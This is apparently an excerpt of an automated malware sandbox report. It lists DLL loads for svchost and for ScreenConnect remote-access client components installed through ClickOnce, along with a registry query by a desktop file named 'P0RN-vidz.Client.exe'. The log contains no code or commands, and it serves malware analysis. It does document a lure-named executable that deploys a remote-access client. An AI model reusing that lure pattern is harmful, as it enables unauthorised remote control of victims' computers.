                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
